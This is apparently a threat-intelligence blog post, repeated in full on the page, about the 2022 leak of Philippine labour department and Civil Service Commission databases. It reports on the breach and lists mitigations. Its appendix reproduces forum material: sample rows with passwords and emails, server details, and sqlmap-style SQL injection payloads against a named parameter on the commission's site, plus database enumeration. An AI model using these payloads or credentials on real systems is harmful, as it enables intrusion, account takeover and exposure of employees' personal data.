🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
Breach
mins read

Philippines Government and Civil Service Commission Data Exposed in May 2022

Philippines Government and Civil Service Commission Data Exposed in May 2022

July 15, 2022
Green Alert
Last Update posted on
February 3, 2024
Secure your organization's sensitive information from data breach.

Protect your sensitive information from unauthorized access and data breaches with CloudSEK XVigil Credential Breaches module, ensuring the security of your valuable data

Schedule a Demo
Table of Contents
Author(s)
No items found.

Threat actors targeted the Philippines Government in May 2022 in cyberattacks, and sensitive Government data was exposed. CloudSEK’s contextual AI digital risk platform XVigil discovered a post on a cybercrime forum, advertising compromised data containing sensitive information from the following databases:

  • Government
  • Civil Service Commission

Analysis and Attribution

Information from the Post

Government Data Breach

  • On 9 May 2022, a threat actor published the database of the Philippines Government for the domain https//dole[.]gov[.]ph.
Threat Actor’s post on a cybercrime forum regarding Government Data Breach
Threat Actor’s post on a cybercrime forum regarding Government Data Breach

 

  • The compromised database contains the following details.
Details Shared
Email:Password Combinations Employees
Managers Job Titles
Employee IDs Comments
Department Data Locations
DOB/Termination Dates Pay Rates/ Types

Civil Service Commission Data Breach

  1. By Database Breach
  • On 15 May 2022, a threat actor published the database of the Civil Service Commission of Philippines for the domain http://csc[.]gov[.]ph.
Threat Actor’s post on a cybercrime forum regarding Civil Service Commission Data Breach
Threat Actor’s post on a cybercrime forum regarding Civil Service Commission Data Breach

 

  • The threat actor dumped the website for users to share or download and use.
  • The Civil Service Commission (CSC) is the Central Personnel Agency of the Philippines Government, responsible for the policies, plans, and programs concerning all civil service employees.
  • The compromised data of total 19121 records includes the following details.
Details Shared
Employer ID City ID Department ID
Region ID Agency ID Type
Token Status Admin
Password Username Created Date and many more fields
  • The actor has also shared information about the system including backend details, DBMS, DBMS user, and hostname.
  • Apart from the Employee information other files such as the following were shared.
Other Files Shared
  • Inventory Logs
  • User Logs
  • User Database
  • Agency Accounts
  • MySQL Logins
  • PhpMyAdmin Dump
  • XAMPP Logins
  • Chat logs of employees have also been compromised and published
  • The actor also mentioned that the site is using plaintext passwords.
  • A threat actor mentioned that the data breached might be from the breach that happened in 2021.
  • However, the publishing threat actor replied that the 2021 breach consisted of sensitive user info without logins and the database was not provided.

By SQL Injection

  • On 15 May 2022, another threat actor on the cyber crime forum shared a similar post with most of the data probably being the same.
  • However, the data breach was performed by SQL Injection on https//csc[.]gov[.]ph, breaching around one million rows of employee information.
  • Another threat actor mentioned that there were unhashed plain text passwords.
Threat Actor’s post on a cybercrime forum regarding Civil Service Commission Data Breach via SQL Injection
Threat Actor’s post on a cybercrime forum regarding Civil Service Commission Data Breach via SQL Injection

 

Impact & Mitigation

Impact Mitigation
  • This sensitive information could be a large-scale risk, leading to exposing of critical government infrastructure.
  • It would equip malicious actors with details required to launch sophisticated ransomware attacks, exfiltrate data, and maintain persistence.
  • If the leaked data is not encrypted, it could enable account takeovers.
  • Commonly used passwords or weak passwords could lead to brute force attacks.
  • PII (Personally Identifiable Information) of the employees belonging to the Government can be used to conduct:
    • Social engineering attacks
    • Phishing attacks
    • Identity theft
  • Scan repositories to identify exposed credentials and secrets.
  • Monitor cybercrime forums for the latest tactics employed by threat actors.
  • Reset the compromised user login credentials and implement a strong password policy for all user accounts.
  • Patch vulnerable and exploitable endpoints.
  • Monitor for anomalies in user accounts, which could indicate possible account takeovers.
  • Audit and monitor all logs of events and incidents to identify unusual patterns and behaviors.

Appendix

2888,1688,2198,32,2991,HRMO,0f87f298,1,1,Zos!J|*z8t#T]wT,[email protected],2015-11-07 06:38:29,2019-06-26 09:49:03,Main Office,ABRA STATE INSTITUTE OF SCIENCE AND TECHNOLOGY,[email protected]

155,133,3293,28,4277,HRMO,9e729eda,1,1,Zo2cU $#T1PYNMv,[email protected],2016-01-08 15:15:13,2020-07-28 14:11:40,Water district,ABULUG WATER DISTRICT (CAGAYAN),[email protected]

2177,995,3019,39,3523,HRMO,b9d8057e,1,1,6!G%FI^,[email protected],2015-10-28 08:13:06,2020-05-04 11:04:38,SUC,AGUSAN DEL SUR STATE COLLEGE OF AGRICULTURE AND TECHNOLOGY,[email protected]

514,754,2940,37,4379,HRMO,da4541c6,1,1,”; ,}-cNJM;:^*W2″,[email protected],2016-01-15 12:21:10,2020-07-09 06:42:36,<blank>,AJUY WATER DISTRICT,[email protected]

515,701,2245,37,2545,HRMO,ee4cd846,1,1,3KBZUdn]56RSj#p,[email protected],2015-11-05 10:59:42,2020-03-13 18:32:14,State College and University,AKLAN STATE UNIVERSITY,root

1647,1411,2720,30,2937,HRMO,f0e0b728,1,1,:6/wJD)c*EHPMx<,[email protected],2015-11-06 16:16:56,2020-06-25 11:52:48,Executive Office,AL-AMANAH ISLAMIC INVESTMENT BANK OF THE PHILIPPINES,[email protected]

153,418,2474,34,628,HRMO,6a5f9bad,1,1,Z7ReJGdnjw|_;Lx,[email protected],2015-10-27 09:23:52,2020-07-09 06:31:47,Water District,ALAMINOS WATER DISTRICT (LAGUNA),[email protected]
System Information:

Quote:

Backend System: Windows 10

DBMS: MySQL 5.5

Hostname: WIN-NEJB836KBNF

DBMS User: ‘jmonses@localhost’

 Info Provided:

Quote:

Inventory Logs

User Logs

User Database

Agency Accounts

MySQL Logins

PhpMyAdmin Dump

XAMPP Logins

FreiChat Chat Logs

Employee Dump (includes full name, addresses, usernames, personal emails, agency and government employed emails)

And More
File Structure:

Quote:

.

|– cdcol

| `– cds.csv

|– csc_cdris

| |– tblref_subcat.csv

| |– tblref_subcat_topic.csv

| |– tblref_topic.csv

| |– tblresource_master.csv

| |– tblusers.csv

| |– vw_resource_master.csv

| |– vw_subcat_category.csv

| `– vw_subcat_topics.csv

|– csc_guestchat

| |– frei_banned_users.csv

| |– frei_chat.csv

| |– frei_config.csv

| |– frei_groupchat.csv

| |– frei_rooms.csv

| |– frei_session.csv

| |– frei_smileys.csv

| |– frei_video_session.csv

| |– frei_video_session.csv.1

| |– frei_webrtc.csv

| `– frei_webrtc.csv.1

|– csc_ighrsdb

| |– ref_2020inventorysummary.csv

| |– ref_2021inventorysummary_asof_aug16.csv

| |– tbl_agencyaccounts.csv

| |– tbl_agencyinventory_logs.csv

| |– tbl_personnel2.csv

| |– tbl_plantilla_jocos.csv

| |– tbl_userlogs.csv

| |– vw_agencyinventory_logs.csv

| |– vw_cscfoaccounts.csv

| `– vw_plantilla_sec_uploading_count.csv

|– csc_ighrsdb_aug312020

|– mysql

| `– user.csv

|– performance_schema

| `– accounts.csv

|– phpmyadmin

| |– pma_bookmark.csv

| |– pma_column_info.csv

| |– pma_designer_coords.csv

| |– pma_history.csv

| |– pma_pdf_pages.csv

| |– pma_recent.csv

| |– pma_relation.csv

| |– pma_table_coords.csv

| |– pma_table_info.csv

| |– pma_table_uiprefs.csv

| |– pma_tracking.csv

| |– pma_userconfig.csv

| `– pma_userconfig.csv.1

`– webauth

`– user_pwd.csv

9 directories, 46 files

Data Sample by SQL Injection

DBs Contain

– info of every PH government employee (tbl_personnel, tbl_personnel2) (firstname, lastname, gender, TIN, SSS, agency, citizenship, salary, phone#, email, v3accesskey, etc..)

– agency account logins for IGHRS panel, can manage all data from that agency

– employee chat logs

bunch more you can see below
web server operating system: Windows

web application technology: PHP 5.5.9, Apache 2.4.7

back-end DBMS: MySQL >= 5.5

Parameter: aid (GET)

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: aid=3094 AND 4076=4076

Type: error-based

Title: MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)

Payload: aid=3094 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786a7871,(SELECT (ELT(5016=5016,1))),0x7162627671,0x78))s), 8446744073709551610, 8446744073709551610)))

Type: stacked queries

Title: MySQL >= 5.0.12 stacked queries (comment)

Payload: aid=3094;SELECT SLEEP(5)#

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: aid=3094 AND (SELECT 1742 FROM (SELECT(SLEEP(5)))SnYj)

Type: UNION query

Title: Generic UNION query (NULL) – 1 column

Payload: aid=-3023 UNION ALL SELECT CONCAT(0x71786a7871,0x5558597156435a75594377414f4c7151614d4655626d675a7a4d6f766f6466414364415972426757,0x7162627671)– –
Database: information_schema

+—————————————————-+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| ENGINES |

| EVENTS |

| FILES |

| GLOBAL_STATUS |

| GLOBAL_VARIABLES |

| INNODB_BUFFER_PAGE |

| INNODB_BUFFER_PAGE_LRU |

| INNODB_BUFFER_POOL_STATS |

| INNODB_CMP |

| INNODB_CMPMEM |

| INNODB_CMPMEM_RESET |

| INNODB_CMP_PER_INDEX |

| INNODB_CMP_PER_INDEX_RESET |

| INNODB_CMP_RESET |

| INNODB_FT_BEING_DELETED |

| INNODB_FT_CONFIG |

| INNODB_FT_DEFAULT_STOPWORD |

| INNODB_FT_DELETED |

| INNODB_FT_INDEX_CACHE |

| INNODB_FT_INDEX_TABLE |

| INNODB_LOCKS |

| INNODB_LOCK_WAITS |

| INNODB_METRICS |

| INNODB_SYS_COLUMNS |

| INNODB_SYS_DATAFILES |

| INNODB_SYS_FIELDS |

| INNODB_SYS_FOREIGN |

| INNODB_SYS_FOREIGN_COLS |

| INNODB_SYS_INDEXES |

| INNODB_SYS_TABLES |

| INNODB_SYS_TABLESPACES |

| INNODB_SYS_TABLESTATS |

| INNODB_TRX |

| KEY_COLUMN_USAGE |

| OPTIMIZER_TRACE |

| PARAMETERS |

| PARTITIONS |

| PLUGINS |

| PROCESSLIST |

| PROFILING |

| REFERENTIAL_CONSTRAINTS |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| SESSION_STATUS |

| SESSION_VARIABLES |

| STATISTICS |

| TABLES |

| TABLESPACES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+—————————————————-+

 Database: cdcol

+—————————————————-+

| cds |

+—————————————————-+

Database: csc_cdris

+—————————————————-+

| chat |

| tblchat |

| tblmember |

| tbloffice |

| tblref_author |

| tblref_category |

| tblref_subcat |

| tblref_subcat_topic |

| tblref_topic |

| tblref_type |

| tblresource_master |

| tblusers |

| vw_resource_master |

| vw_subcat_category |

| vw_subcat_topics |

| vw_type_category |

| vw_user_accomplishment |

| vw_user_accomplishment_withtype |

+—————————————————-+

Database: csc_guestchat

+—————————————————-+

| frei_banned_users |

| frei_chat |

| frei_config |

| frei_groupchat |

| frei_rooms |

| frei_session |

| frei_smileys |

| frei_video_session |

| frei_webrtc |

+—————————————————-+
Database: performance_schema

+—————————————————-+

| accounts |

| cond_instances |

| events_stages_current |

| events_stages_history |

| events_stages_history_long |

| events_stages_summary_by_account_by_event_name |

| events_stages_summary_by_host_by_event_name |

| events_stages_summary_by_thread_by_event_name |

| events_stages_summary_by_user_by_event_name |

| events_stages_summary_global_by_event_name |

| events_statements_current |

| events_statements_history |

| events_statements_history_long |

| events_statements_summary_by_account_by_event_name |

| events_statements_summary_by_digest |

| events_statements_summary_by_host_by_event_name |

| events_statements_summary_by_thread_by_event_name |

| events_statements_summary_by_user_by_event_name |

| events_statements_summary_global_by_event_name |

| events_waits_current |

| events_waits_history |

| events_waits_history_long |

| events_waits_summary_by_account_by_event_name |

| events_waits_summary_by_host_by_event_name |

| events_waits_summary_by_instance |

| events_waits_summary_by_thread_by_event_name |

| events_waits_summary_by_user_by_event_name |

| events_waits_summary_global_by_event_name |

| file_instances |

 Database: phpmyadmin

+—————————————————-+

| pma_bookmark |

| pma_column_info |

| pma_designer_coords |

| pma_history |

| pma_pdf_pages |

| pma_recent |

| pma_relation |

| pma_table_coords |

| pma_table_info |

| pma_table_uiprefs |

| pma_tracking |

| pma_userconfig |

+—————————————————-+

Database: webauth

+—————————————————-+

| user_pwd |

+—————————————————-+
Database: csc_ighrsdb

+—————————————————-+

| female_names |

| female_names_copy |

| frei_banned_users |

| frei_chat |

| frei_config |

| frei_groupchat |

| frei_rooms |

| frei_session |

| frei_smileys |

| frei_video_session |

| frei_webrtc |

| male_names |

| ref_2020dashboardsummary |

| ref_2020inventorysummary |

| ref_2021dashboardsummary |

| ref_2021inventorysummary |

| ref_2021inventorysummary_asof_aug16 |

| ref_2021inventorysummary_byage_mar2021 |

| ref_2021plantilapersonnel_asofaug312021 |

| tbl_agency_offices |

| tbl_agencyaccounts |

| tbl_agencyhrmo |

| tbl_agencyinventory |

| tbl_agencyinventory_archive |

| tbl_agencyinventory_logs |

| tbl_agencyinventory_plantilla |

| tbl_agencyinventory_plantilla_archive |

| tbl_agencyinventory_plantilla_byage |

| tbl_agencyinventory_tmp |

| tbl_branch_office |

| tbl_cscofficelookup |

| tbl_dashboardsummary |

| tbl_dashboardsummary_archive |

| tbl_dashboardsummary_plantilla |

| tbl_dashboardsummary_plantilla_archive |

| tbl_job_grade |

| tbl_personnel |

| tbl_personnel2 |

| tbl_personnel_uplink_errors |

| tbl_plantilla |

| tbl_plantilla_jocos |

| tbl_plantilla_jocos_copy |

| tbl_plantilla_jocos_hist |

| tbl_plantilla_logs |

| tbl_plantilla_mod_login |

| tbl_plantilla_ncareer |

| tbl_plantilla_ncareer_hist |

| tbl_plantilla_uplink_errors |

| tbl_plmonitoring_dump |

| tbl_pm_accessed |

| tbl_pos_annotations |

| tbl_position |

| tbl_resourcefile |

| tbl_salary_grade |

| tbl_salary_grade_2016 |

| tbl_salary_grade_2017 |

| tbl_salary_grade_2018 |

| tbl_salary_grade_2019 |

| tbl_salary_grade_2020 |

| tbl_seqref |

| tbl_servicecounter |

| tbl_settings |

| tbl_upload_interrupt |

| tbl_uploadfile |

| tbl_userlogs |

| tbl_version_update |

| tblref_agencyaddress |

| tblref_eligibility |

| tblusers |

| vw_agencyaccounts |

| vw_agencyhrmo_accts |

| vw_agencyinventory |

| vw_agencyinventory_archive |

| vw_agencyinventory_dtl_rpt |

| vw_agencyinventory_gender |

| vw_agencyinventory_logs |

| vw_agencyinventory_plantilla_dtl_rpt |

| vw_agencyinventory_plantilla_dtl_rpt_age |

| vw_agencyinventory_rpt |

| vw_agencyinventory_summary |

| vw_agencyinventory_summary2 |

| vw_agencyinventory_summary3_plantilla |

| vw_agencyinventory_summary4_plantilla |

| vw_cscfoaccounts |

| vw_cscroaccounts |

| vw_personnel_manager |

| vw_plantilla_noncareer |

| vw_plantilla_of_personnel |

| vw_plantilla_personnel |

| vw_plantilla_query |

| vw_plantilla_sec_uploading_count |

| vw_userlog_monthly |

| vw_userlogs |

+—————————————————-+

Database: mysql

+—————————————————-+

| user |

| columns_priv |

| db |

| event |

| func |

| general_log |

| help_category |

| help_keyword |

| help_relation |

| help_topic |

| innodb_index_stats |

| innodb_table_stats |

| ndb_binlog_index |

| plugin |

| proc |

| procs_priv |

| proxies_priv |

| servers |

| slave_master_info |

| slave_relay_log_info |

| slave_worker_info |

| slow_log |

| tables_priv |

| time_zone |

| time_zone_leap_second |

| time_zone_name |

| time_zone_transition |

| time_zone_transition_type |

+—————————————————-+

| file_summary_by_event_name |

| file_summary_by_instance |

| host_cache |

| hosts |

| mutex_instances |

| objects_summary_global_by_type |

| performance_timers |

| rwlock_instances |

| session_account_connect_attrs |

| session_connect_attrs |

| setup_actors |

| setup_consumers |

| setup_instruments |

| setup_objects |

| setup_timers |

| socket_instances |

| socket_summary_by_event_name |

| socket_summary_by_instance |

| table_io_waits_summary_by_index_usage |

| table_io_waits_summary_by_table |

| table_lock_waits_summary_by_table |

| threads |

| users |

+—————————————————-+

 Database: csc_ighrsdb_aug312020

+—————————————————-+

| female_names |

| female_names_copy |

| frei_banned_users |

| frei_chat |

| frei_config |

| frei_groupchat |

| frei_rooms |

| frei_session |

| frei_smileys |

| frei_video_session |

| frei_webrtc |

| male_names |

| rpt_dashboardsummary_asof08312020 |

| rpt_dashboardsummary_asofjuly10 |

| rpt_dashboardsummary_asofjuly13 |

| rpt_inventorysummary_asof08312020 |

| rpt_inventorysummary_asofjuly10 |

| rpt_inventorysummary_asofjuly13 |

| tbl_agency_offices |

| tbl_agencyaccounts |

| tbl_agencyhrmo |

| tbl_agencyinventory |

| tbl_agencyinventory_archive |

| tbl_agencyinventory_logs |

| tbl_agencyinventory_plantilla |

| tbl_agencyinventory_plantilla_archive |

| tbl_agencyinventory_plantilla_withage |

| tbl_agencyinventory_tmp |

| tbl_branch_office |

| tbl_cscofficelookup |

| tbl_dashboardsummary |

| tbl_dashboardsummary_archive |

| tbl_dashboardsummary_plantilla |

| tbl_dashboardsummary_plantilla_archive |

| tbl_job_grade |

| tbl_personnel |

| tbl_personnel2 |

| tbl_personnel_uplink_errors |

| tbl_plantilla |

| tbl_plantilla_jocos |

| tbl_plantilla_jocos_copy |

| tbl_plantilla_jocos_hist |

| tbl_plantilla_logs |

| tbl_plantilla_mod_login |

| tbl_plantilla_ncareer |

| tbl_plantilla_ncareer_hist |

| tbl_plantilla_uplink_errors |

| tbl_plmonitoring_dump |

| tbl_pm_accessed |

| tbl_pos_annotations |

| tbl_position |

| tbl_resourcefile |

| tbl_salary_grade |

| tbl_salary_grade_2016 |

| tbl_salary_grade_2017 |

| tbl_salary_grade_2018 |

| tbl_salary_grade_2019 |

| tbl_salary_grade_2020 |

| tbl_seqref |

| tbl_servicecounter |

| tbl_settings |

| tbl_upload_interrupt |

| tbl_uploadfile |

| tbl_userlogs |

| tbl_version_update |

| tblref_agencyaddress |

| tblref_eligibility |

| tblusers |

| vw_agencyaccounts |

| vw_agencyhrmo_accts |

| vw_agencyinventory |

| vw_agencyinventory_archive |

| vw_agencyinventory_dtl_rpt |

| vw_agencyinventory_gender |

| vw_agencyinventory_logs |

| vw_agencyinventory_plantilla_dtl_rpt |

| vw_agencyinventory_rpt |

| vw_agencyinventory_summary |

| vw_agencyinventory_summary2 |

| vw_agencyinventory_summary3_plantilla |

| vw_cscfoaccounts |

| vw_cscroaccounts |

| vw_plantilla_noncareer |

| vw_plantilla_of_personnel |

| vw_plantilla_personnel |

| vw_plantilla_query |

| vw_plantilla_sec_uploading_count |

| vw_userlog_monthly |

| vw_userlogs |

+—————————————————-+

Database: csc_lookupdb

+—————————————————-+

| vw\x1f_agencymaster2 |

| agency_reference |

| area_reference |

| area_type_reference |

| district_reference |

| eligibility_reference |

| level_reference |

| municipality_reference |

| pos_status_reference |

| position_reference |

| position_reference_copy |

| position_reference_nongovt |

| province_reference |

| salary_grade_reference |

| status_reference |

| tbl_citylookup |

| tbl_cscofficelookup |

| tbl_eligibilitytype |

| tbl_examcenterlookup |

| tbl_zipcode |

| tbldibar_reflookup |

| tblref_agencydept |

| tblref_agencydept_nongovt |

| tblref_agencyhrmo |

| tblref_agencyro |

| tblref_agencysector |

| tblref_agencytype |

| tblref_bloodtype |

| tblref_citizenship |

| tblref_civilstatus |

| tblref_deptagency_tmp |

| tblref_educcourses |

| tblref_educlevel |

| tblref_educschool |

| tblref_empstatus |

| tblref_regions |

| tblref_religion |

| tblref_trainingprovider |

| tblref_trainingtitle |

| vw_agencyhrmo |

| vw_agencylookup |

| vw_agencymaster |

| vw_agencyromaster |

| vw_agencysector_type |

+—————————————————-+

Author

Predict Cyber threats against your organization

Schedule a Demo
Related Posts
Blog Image
Emerging Threats
August 20, 2022

ID Card Printing Scams Orchestrated by UP-Based Group Defrauds the Indian Public

ID Card Printing Scams Orchestrated by UP-Based Group Defrauds the Indian Public

Join 10,000+ subscribers

Keep up with the latest news about strains of Malware, Phishing Lures,
Indicators of Compromise, and Data Leaks.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

CloudSEK XVigil

Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.

Learn more about XVigil
CloudSEK SVigil

Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.

Learn more about SVigil
CloudSEK SVigil

Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.

Learn more about BeVigil Ent
CloudSEK BeVigil

Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.

Learn more about BeVigil
Breach

min read

Philippines Government and Civil Service Commission Data Exposed in May 2022

Philippines Government and Civil Service Commission Data Exposed in May 2022

Authors
Co-Authors
No items found.

Threat actors targeted the Philippines Government in May 2022 in cyberattacks, and sensitive Government data was exposed. CloudSEK’s contextual AI digital risk platform XVigil discovered a post on a cybercrime forum, advertising compromised data containing sensitive information from the following databases:

  • Government
  • Civil Service Commission

Analysis and Attribution

Information from the Post

Government Data Breach

  • On 9 May 2022, a threat actor published the database of the Philippines Government for the domain https//dole[.]gov[.]ph.
Threat Actor’s post on a cybercrime forum regarding Government Data Breach
Threat Actor’s post on a cybercrime forum regarding Government Data Breach

 

  • The compromised database contains the following details.
Details Shared
Email:Password Combinations Employees
Managers Job Titles
Employee IDs Comments
Department Data Locations
DOB/Termination Dates Pay Rates/ Types

Civil Service Commission Data Breach

  1. By Database Breach
  • On 15 May 2022, a threat actor published the database of the Civil Service Commission of Philippines for the domain http://csc[.]gov[.]ph.
Threat Actor’s post on a cybercrime forum regarding Civil Service Commission Data Breach
Threat Actor’s post on a cybercrime forum regarding Civil Service Commission Data Breach

 

  • The threat actor dumped the website for users to share or download and use.
  • The Civil Service Commission (CSC) is the Central Personnel Agency of the Philippines Government, responsible for the policies, plans, and programs concerning all civil service employees.
  • The compromised data of total 19121 records includes the following details.
Details Shared
Employer ID City ID Department ID
Region ID Agency ID Type
Token Status Admin
Password Username Created Date and many more fields
  • The actor has also shared information about the system including backend details, DBMS, DBMS user, and hostname.
  • Apart from the Employee information other files such as the following were shared.
Other Files Shared
  • Inventory Logs
  • User Logs
  • User Database
  • Agency Accounts
  • MySQL Logins
  • PhpMyAdmin Dump
  • XAMPP Logins
  • Chat logs of employees have also been compromised and published
  • The actor also mentioned that the site is using plaintext passwords.
  • A threat actor mentioned that the data breached might be from the breach that happened in 2021.
  • However, the publishing threat actor replied that the 2021 breach consisted of sensitive user info without logins and the database was not provided.

By SQL Injection

  • On 15 May 2022, another threat actor on the cyber crime forum shared a similar post with most of the data probably being the same.
  • However, the data breach was performed by SQL Injection on https//csc[.]gov[.]ph, breaching around one million rows of employee information.
  • Another threat actor mentioned that there were unhashed plain text passwords.
Threat Actor’s post on a cybercrime forum regarding Civil Service Commission Data Breach via SQL Injection
Threat Actor’s post on a cybercrime forum regarding Civil Service Commission Data Breach via SQL Injection

 

Impact & Mitigation

Impact Mitigation
  • This sensitive information could be a large-scale risk, leading to exposing of critical government infrastructure.
  • It would equip malicious actors with details required to launch sophisticated ransomware attacks, exfiltrate data, and maintain persistence.
  • If the leaked data is not encrypted, it could enable account takeovers.
  • Commonly used passwords or weak passwords could lead to brute force attacks.
  • PII (Personally Identifiable Information) of the employees belonging to the Government can be used to conduct:
    • Social engineering attacks
    • Phishing attacks
    • Identity theft
  • Scan repositories to identify exposed credentials and secrets.
  • Monitor cybercrime forums for the latest tactics employed by threat actors.
  • Reset the compromised user login credentials and implement a strong password policy for all user accounts.
  • Patch vulnerable and exploitable endpoints.
  • Monitor for anomalies in user accounts, which could indicate possible account takeovers.
  • Audit and monitor all logs of events and incidents to identify unusual patterns and behaviors.

Appendix

2888,1688,2198,32,2991,HRMO,0f87f298,1,1,Zos!J|*z8t#T]wT,[email protected],2015-11-07 06:38:29,2019-06-26 09:49:03,Main Office,ABRA STATE INSTITUTE OF SCIENCE AND TECHNOLOGY,[email protected]

155,133,3293,28,4277,HRMO,9e729eda,1,1,Zo2cU $#T1PYNMv,[email protected],2016-01-08 15:15:13,2020-07-28 14:11:40,Water district,ABULUG WATER DISTRICT (CAGAYAN),[email protected]

2177,995,3019,39,3523,HRMO,b9d8057e,1,1,6!G%FI^,[email protected],2015-10-28 08:13:06,2020-05-04 11:04:38,SUC,AGUSAN DEL SUR STATE COLLEGE OF AGRICULTURE AND TECHNOLOGY,[email protected]

514,754,2940,37,4379,HRMO,da4541c6,1,1,”; ,}-cNJM;:^*W2″,[email protected],2016-01-15 12:21:10,2020-07-09 06:42:36,<blank>,AJUY WATER DISTRICT,[email protected]

515,701,2245,37,2545,HRMO,ee4cd846,1,1,3KBZUdn]56RSj#p,[email protected],2015-11-05 10:59:42,2020-03-13 18:32:14,State College and University,AKLAN STATE UNIVERSITY,root

1647,1411,2720,30,2937,HRMO,f0e0b728,1,1,:6/wJD)c*EHPMx<,[email protected],2015-11-06 16:16:56,2020-06-25 11:52:48,Executive Office,AL-AMANAH ISLAMIC INVESTMENT BANK OF THE PHILIPPINES,[email protected]

153,418,2474,34,628,HRMO,6a5f9bad,1,1,Z7ReJGdnjw|_;Lx,[email protected],2015-10-27 09:23:52,2020-07-09 06:31:47,Water District,ALAMINOS WATER DISTRICT (LAGUNA),[email protected]
System Information:

Quote:

Backend System: Windows 10

DBMS: MySQL 5.5

Hostname: WIN-NEJB836KBNF

DBMS User: ‘jmonses@localhost’

 Info Provided:

Quote:

Inventory Logs

User Logs

User Database

Agency Accounts

MySQL Logins

PhpMyAdmin Dump

XAMPP Logins

FreiChat Chat Logs

Employee Dump (includes full name, addresses, usernames, personal emails, agency and government employed emails)

And More
File Structure:

Quote:

.

|– cdcol

| `– cds.csv

|– csc_cdris

| |– tblref_subcat.csv

| |– tblref_subcat_topic.csv

| |– tblref_topic.csv

| |– tblresource_master.csv

| |– tblusers.csv

| |– vw_resource_master.csv

| |– vw_subcat_category.csv

| `– vw_subcat_topics.csv

|– csc_guestchat

| |– frei_banned_users.csv

| |– frei_chat.csv

| |– frei_config.csv

| |– frei_groupchat.csv

| |– frei_rooms.csv

| |– frei_session.csv

| |– frei_smileys.csv

| |– frei_video_session.csv

| |– frei_video_session.csv.1

| |– frei_webrtc.csv

| `– frei_webrtc.csv.1

|– csc_ighrsdb

| |– ref_2020inventorysummary.csv

| |– ref_2021inventorysummary_asof_aug16.csv

| |– tbl_agencyaccounts.csv

| |– tbl_agencyinventory_logs.csv

| |– tbl_personnel2.csv

| |– tbl_plantilla_jocos.csv

| |– tbl_userlogs.csv

| |– vw_agencyinventory_logs.csv

| |– vw_cscfoaccounts.csv

| `– vw_plantilla_sec_uploading_count.csv

|– csc_ighrsdb_aug312020

|– mysql

| `– user.csv

|– performance_schema

| `– accounts.csv

|– phpmyadmin

| |– pma_bookmark.csv

| |– pma_column_info.csv

| |– pma_designer_coords.csv

| |– pma_history.csv

| |– pma_pdf_pages.csv

| |– pma_recent.csv

| |– pma_relation.csv

| |– pma_table_coords.csv

| |– pma_table_info.csv

| |– pma_table_uiprefs.csv

| |– pma_tracking.csv

| |– pma_userconfig.csv

| `– pma_userconfig.csv.1

`– webauth

`– user_pwd.csv

9 directories, 46 files

Data Sample by SQL Injection

DBs Contain

– info of every PH government employee (tbl_personnel, tbl_personnel2) (firstname, lastname, gender, TIN, SSS, agency, citizenship, salary, phone#, email, v3accesskey, etc..)

– agency account logins for IGHRS panel, can manage all data from that agency

– employee chat logs

bunch more you can see below
web server operating system: Windows

web application technology: PHP 5.5.9, Apache 2.4.7

back-end DBMS: MySQL >= 5.5

Parameter: aid (GET)

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: aid=3094 AND 4076=4076

Type: error-based

Title: MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)

Payload: aid=3094 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786a7871,(SELECT (ELT(5016=5016,1))),0x7162627671,0x78))s), 8446744073709551610, 8446744073709551610)))

Type: stacked queries

Title: MySQL >= 5.0.12 stacked queries (comment)

Payload: aid=3094;SELECT SLEEP(5)#

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: aid=3094 AND (SELECT 1742 FROM (SELECT(SLEEP(5)))SnYj)

Type: UNION query

Title: Generic UNION query (NULL) – 1 column

Payload: aid=-3023 UNION ALL SELECT CONCAT(0x71786a7871,0x5558597156435a75594377414f4c7151614d4655626d675a7a4d6f766f6466414364415972426757,0x7162627671)– –
Database: information_schema

+—————————————————-+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| ENGINES |

| EVENTS |

| FILES |

| GLOBAL_STATUS |

| GLOBAL_VARIABLES |

| INNODB_BUFFER_PAGE |

| INNODB_BUFFER_PAGE_LRU |

| INNODB_BUFFER_POOL_STATS |

| INNODB_CMP |

| INNODB_CMPMEM |

| INNODB_CMPMEM_RESET |

| INNODB_CMP_PER_INDEX |

| INNODB_CMP_PER_INDEX_RESET |

| INNODB_CMP_RESET |

| INNODB_FT_BEING_DELETED |

| INNODB_FT_CONFIG |

| INNODB_FT_DEFAULT_STOPWORD |

| INNODB_FT_DELETED |

| INNODB_FT_INDEX_CACHE |

| INNODB_FT_INDEX_TABLE |

| INNODB_LOCKS |

| INNODB_LOCK_WAITS |

| INNODB_METRICS |

| INNODB_SYS_COLUMNS |

| INNODB_SYS_DATAFILES |

| INNODB_SYS_FIELDS |

| INNODB_SYS_FOREIGN |

| INNODB_SYS_FOREIGN_COLS |

| INNODB_SYS_INDEXES |

| INNODB_SYS_TABLES |

| INNODB_SYS_TABLESPACES |

| INNODB_SYS_TABLESTATS |

| INNODB_TRX |

| KEY_COLUMN_USAGE |

| OPTIMIZER_TRACE |

| PARAMETERS |

| PARTITIONS |

| PLUGINS |

| PROCESSLIST |

| PROFILING |

| REFERENTIAL_CONSTRAINTS |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

